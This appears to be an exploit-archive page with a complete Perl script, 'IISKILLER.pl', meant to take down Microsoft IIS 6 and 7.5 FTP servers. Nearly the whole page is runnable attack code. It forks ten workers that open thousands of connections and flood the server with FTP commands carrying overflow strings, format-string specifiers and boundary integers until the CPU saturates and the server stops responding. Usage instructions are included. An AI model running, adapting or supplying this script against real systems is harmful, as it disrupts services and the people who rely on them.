Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service



EKU-ID: 2404 CVE: OSVDB-ID:
Author: coolkaveh Published: 2012-07-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version:  Microsoft IIS 6 , 7.5  FTP Server
# Tested on: windows server 2008 r2 , seven , with two core prossosor
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#When sending multiple parallel FTP command  requests to a Microsoft IIS FTP Server
#CPU usage goes up to max capacity  and server gets non responsive.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Lame Microsoft IIS FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
    print "FTP Server Remote Denial Of Service\n";
    print "by coolkaveh\n";
    print "usage: perl IISKILLER.pl <host> \n";
    print "example: perl IISKILLER.pl www.example.com \n";
exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
print "$host -> $port is alive.\n";
$check_first->close;
}
else{
die("$host -> $port is closed!\n");
}
@all=(
'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s',
'%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%',
'%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000',
'0x100000','1',
'A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,'A'x2049,'A'x4097,'A'x8193,'A'x12288,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s','%08x','%%20d','%%20n','%%20x','%%20s',
'%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p','%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%',
'%s'x129,'%x'x257,'-1','0','0x100','0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000',
'0x100000','1',
);
sub check(){
#Thread->self->detach;
$sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $sock){
#print "$host -> $port is alive.\n";
undef($content_tmp);
$sock->recv($content_tmp,100,0);
if(length($content_tmp)>0){
$sock->close;
return 1;
}else{
$sock->close;
return 0;
}
}else{
#print("$host -> $port is closed!\n");
return 0;
}
}
@command=(
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',
'NLST','CWD','STOR','RETR','MKD','RMD','DELE','RNFR','RNTO','LIST',     
'MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE',
'SITE INDEX','TYPE','TYPE A', 'TYPE E', 'TYPE L', 'TYPE I',            
);
print "Start To Dos it!\n";
#enumerate command
$pm = new Parallel::ForkManager(10);
for($i = 1; $i < 9000; $i++) {
my $pid = $pm->start and next;
   COMMANDS: foreach $cmd (@command){
foreach $poc (@all){
LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
if(defined($sock4)){
$sock4->send("$cmd"." "."$poc\r\n", 0);
$sock4->recv($content, 0, 900);
}
}
}
$pm->finish;
}